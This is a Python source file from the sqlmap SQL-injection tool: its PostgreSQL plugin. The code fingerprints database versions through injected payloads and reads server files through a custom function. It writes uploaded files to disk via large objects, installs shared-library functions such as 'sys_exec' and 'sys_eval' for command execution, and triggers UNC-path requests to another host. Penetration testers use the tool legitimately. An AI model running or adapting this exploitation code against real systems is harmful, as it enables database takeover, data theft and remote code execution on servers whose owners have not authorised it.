#!/usr/bin/env python """ $Id$ This file is part of the sqlmap project, http://sqlmap.sourceforge.net. Copyright (c) 2007-2009 Bernardo Damele A. G. Copyright (c) 2006 Daniele Bellucci sqlmap is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with sqlmap; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import os import re from lib.core.agent import agent from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp from lib.core.common import getRange from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.exception import sqlmapNoneDataException from lib.core.exception import sqlmapSyntaxException from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.session import setDbms from lib.core.settings import PGSQL_ALIASES from lib.core.settings import PGSQL_SYSTEM_DBS from lib.core.unescaper import unescaper from lib.request import inject from lib.request.connect import Connect as Request from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem from plugins.generic.fingerprint import Fingerprint from plugins.generic.misc import Miscellaneous from plugins.generic.takeover import Takeover class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines PostgreSQL methods """ def __init__(self): self.excludeDbsList = PGSQL_SYSTEM_DBS self.sysUdfs = { # UDF name: UDF parameters' input data-type and return data-type "sys_exec": { "input": [ "text" ], "return": "int4" }, "sys_eval": { "input": [ "text" ], "return": "text" }, "sys_bineval": { "input": [ "text" ], "return": "int4" }, "sys_fileread": { "input": [ "text" ], "return": "text" } } Enumeration.__init__(self, "PostgreSQL") Filesystem.__init__(self) Takeover.__init__(self) unescaper.setUnescape(PostgreSQLMap.unescape) @staticmethod def unescape(expression, quote=True): if quote: while True: index = expression.find("'") if index == -1: break firstIndex = index + 1 index = expression[firstIndex:].find("'") if index == -1: raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression lastIndex = firstIndex + index old = "'%s'" % expression[firstIndex:lastIndex] #unescaped = "(" unescaped = "" for i in range(firstIndex, lastIndex): unescaped += "CHR(%d)" % (ord(expression[i])) if i < lastIndex - 1: unescaped += "||" #unescaped += ")" expression = expression.replace(old, unescaped) else: expression = "||".join("CHR(%d)" % ord(c) for c in expression) return expression @staticmethod def escape(expression): while True: index = expression.find("CHR(") if index == -1: break firstIndex = index index = expression[firstIndex:].find("))") if index == -1: raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression lastIndex = firstIndex + index + 1 old = expression[firstIndex:lastIndex] oldUpper = old.upper() oldUpper = oldUpper.replace("CHR(", "").replace(")", "") oldUpper = oldUpper.split("||") escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper]) expression = expression.replace(old, escaped) return expression def getFingerprint(self): value = "" wsOsFp = formatFingerprint("web server", kb.headersFp) if wsOsFp: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp) if dbmsOsFp: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " if not conf.extensiveFp: value += "PostgreSQL" return value actVer = formatDBMSfp() blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] banVer = formatDBMSfp([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) return value def checkDbms(self): """ References for fingerprint: * http://www.postgresql.org/docs/8.4/interactive/release.html (up to 8.4.2) """ if conf.dbms in PGSQL_ALIASES: setDbms("PostgreSQL") self.getBanner() if not conf.extensiveFp: return True infoMsg = "testing PostgreSQL" logger.info(infoMsg) randInt = str(randomInt(1)) payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt)) result = Request.queryPage(payload) if result: infoMsg = "confirming PostgreSQL" logger.info(infoMsg) payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt)) result = Request.queryPage(payload) if not result: warnMsg = "the back-end DMBS is not PostgreSQL" logger.warn(warnMsg) return False setDbms("PostgreSQL") self.getBanner() if not conf.extensiveFp: return True if inject.getValue("DIV(6, 3)", unpack=False, charsetType=2) == "2": kb.dbmsVersion = [">= 8.4.0"] elif inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)", unpack=False, charsetType=2) in ( "1", "2" ) and not inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2) in ( "1", "2" ): kb.dbmsVersion = [">= 8.3.0", "< 8.4"] elif inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2): kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"] elif inject.getValue("GREATEST(5, 9, 1)", unpack=False, charsetType=2) == "9": kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"] elif inject.getValue("WIDTH_BUCKET(5.35, 0.024, 10.06, 5)", unpack=False, charsetType=2) == "3": kb.dbmsVersion = [">= 8.0.0", "< 8.1.0"] elif inject.getValue("SUBSTR(MD5('sqlmap'), 1, 1)", unpack=False): kb.dbmsVersion = [">= 7.4.0", "< 8.0.0"] elif inject.getValue("SUBSTR(CURRENT_SCHEMA(), 1, 1)", unpack=False) == "p": kb.dbmsVersion = [">= 7.3.0", "< 7.4.0"] elif inject.getValue("BIT_LENGTH(1)") == "8": kb.dbmsVersion = [">= 7.2.0", "< 7.3.0"] elif inject.getValue("SUBSTR(QUOTE_LITERAL('a'), 2, 1)", unpack=False) == "a": kb.dbmsVersion = [">= 7.1.0", "< 7.2.0"] elif inject.getValue("POW(2, 3)", unpack=False, charsetType=2) == "8": kb.dbmsVersion = [">= 7.0.0", "< 7.1.0"] elif inject.getValue("MAX('a')") == "a": kb.dbmsVersion = [">= 6.5.0", "< 6.5.3"] elif re.search("([\d\.]+)", inject.getValue("SUBSTR(VERSION(), 12, 5)", unpack=False)): kb.dbmsVersion = [">= 6.4.0", "< 6.5.0"] elif inject.getValue("SUBSTR(CURRENT_DATE, 1, 1)", unpack=False, charsetType=2) == "2": kb.dbmsVersion = [">= 6.3.0", "< 6.4.0"] elif inject.getValue("SUBSTRING('sqlmap', 1, 1)", unpack=False) == "s": kb.dbmsVersion = [">= 6.2.0", "< 6.3.0"] else: kb.dbmsVersion = ["< 6.2.0"] return True else: warnMsg = "the back-end DMBS is not PostgreSQL" logger.warn(warnMsg) return False def checkDbmsOs(self, detailed=False): if kb.os: return infoMsg = "fingerprinting the back-end DBMS operating system" logger.info(infoMsg) self.createSupportTbl(self.fileTblName, self.tblField, "character(1000)") inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()")) # Windows executables should always have ' Visual C++' or ' mingw' # patterns within the banner osWindows = ( " Visual C++", "mingw" ) for osPattern in osWindows: query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%" + osPattern + "%')>0" query = agent.forgeCaseStatement(query) if inject.getValue(query, charsetType=1) == "1": kb.os = "Windows" break if kb.os is None: kb.os = "Linux" infoMsg = "the back-end DBMS operating system is %s" % kb.os logger.info(infoMsg) self.cleanup(onlyFileTbl=True) def forceDbmsEnum(self): if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public": conf.db = "public" warnMsg = "on PostgreSQL it is only possible to enumerate " warnMsg += "on the current schema and on system databases, " warnMsg += "sqlmap is going to use 'public' schema as " warnMsg += "database name" logger.warn(warnMsg) def unionReadFile(self, rFile): errMsg = "PostgreSQL does not support file reading with UNION " errMsg += "query SQL injection technique" raise sqlmapUnsupportedFeatureException, errMsg def stackedReadFile(self, rFile): infoMsg = "fetching file: '%s'" % rFile logger.info(infoMsg) self.initEnv() return self.udfEvalCmd(cmd="'%s'" % rFile, udfName="sys_fileread") def unionWriteFile(self, wFile, dFile, fileType, confirm=True): errMsg = "PostgreSQL does not support file upload with UNION " errMsg += "query SQL injection technique" raise sqlmapUnsupportedFeatureException, errMsg def stackedWriteFile(self, wFile, dFile, fileType, confirm=True): wFileSize = os.path.getsize(wFile) if wFileSize > 8192: errMsg = "on PostgreSQL it is not possible to write files " errMsg += "bigger than 8192 bytes at the moment" raise sqlmapUnsupportedFeatureException, errMsg self.oid = randomInt() debugMsg = "creating a support table to write the base64 " debugMsg += "encoded file to" logger.debug(debugMsg) self.createSupportTbl(self.fileTblName, self.tblField, "text") logger.debug("encoding file to its base64 string value") fcEncodedList = self.fileEncode(wFile, "base64", False) debugMsg = "forging SQL statements to write the base64 " debugMsg += "encoded file to the support table" logger.debug(debugMsg) sqlQueries = self.fileToSqlQueries(fcEncodedList) logger.debug("inserting the base64 encoded file to the support table") for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) debugMsg = "create a new OID for a large object, it implicitly " debugMsg += "adds an entry in the large objects system table" logger.debug(debugMsg) # References: # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid) debugMsg = "updating the system large objects table assigning to " debugMsg += "the just created OID the binary (base64 decoded) UDF " debugMsg += "as data" logger.debug(debugMsg) # Refereces: # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql # # NOTE: From PostgreSQL site: # # "The data stored in the large object will never be more than # LOBLKSIZE bytes and might be less which is BLCKSZ/4, or # typically 2 Kb" # # As a matter of facts it was possible to store correctly a file # large 13776 bytes, the problem arises at next step (lo_export()) inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) debugMsg = "exporting the OID %s file content to " % fileType debugMsg += "file '%s'" % dFile logger.debug(debugMsg) # NOTE: lo_export() exports up to only 8192 bytes of the file # (pg_largeobject 'data' field) inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) if confirm: self.askCheckWrittenFile(wFile, dFile, fileType) inject.goStacked("SELECT lo_unlink(%d)" % self.oid) def udfSetRemotePath(self): # On Windows if kb.os == "Windows": # The DLL can be in any folder where postgres user has # read/write/execute access is valid # NOTE: by not specifing any path, it will save into the # data directory, on PostgreSQL 8.3 it is # C:\Program Files\PostgreSQL\8.3\data. self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) # On Linux else: # The SO can be in any folder where postgres user has # read/write/execute access is valid self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) def udfSetLocalPaths(self): self.udfLocalFile = paths.SQLMAP_UDF_PATH self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) self.getVersionFromBanner() banVer = kb.bannerFp["dbmsVersion"] if banVer >= "8.4": majorVer = "8.4" elif banVer >= "8.3": majorVer = "8.3" elif banVer >= "8.2": majorVer = "8.2" else: errMsg = "unsupported feature on versions of PostgreSQL before 8.2" raise sqlmapUnsupportedFeatureException, errMsg if kb.os == "Windows": self.udfLocalFile += "/postgresql/windows/%s/lib_postgresqludf_sys.dll" % majorVer self.udfSharedLibExt = "dll" else: self.udfLocalFile += "/postgresql/linux/%s/lib_postgresqludf_sys.so" % majorVer self.udfSharedLibExt = "so" def udfCreateFromSharedLib(self, udf, inpRet): if udf in self.udfToCreate: logger.info("creating UDF '%s' from the binary UDF file" % udf) inp = ", ".join(i for i in inpRet["input"]) ret = inpRet["return"] # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html inject.goStacked("DROP FUNCTION %s" % udf) inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf)) self.createdUdf.add(udf) else: logger.debug("keeping existing UDF '%s' as requested" % udf) def uncPathRequest(self): self.createSupportTbl(self.fileTblName, self.tblField, "text") inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) self.cleanup(onlyFileTbl=True)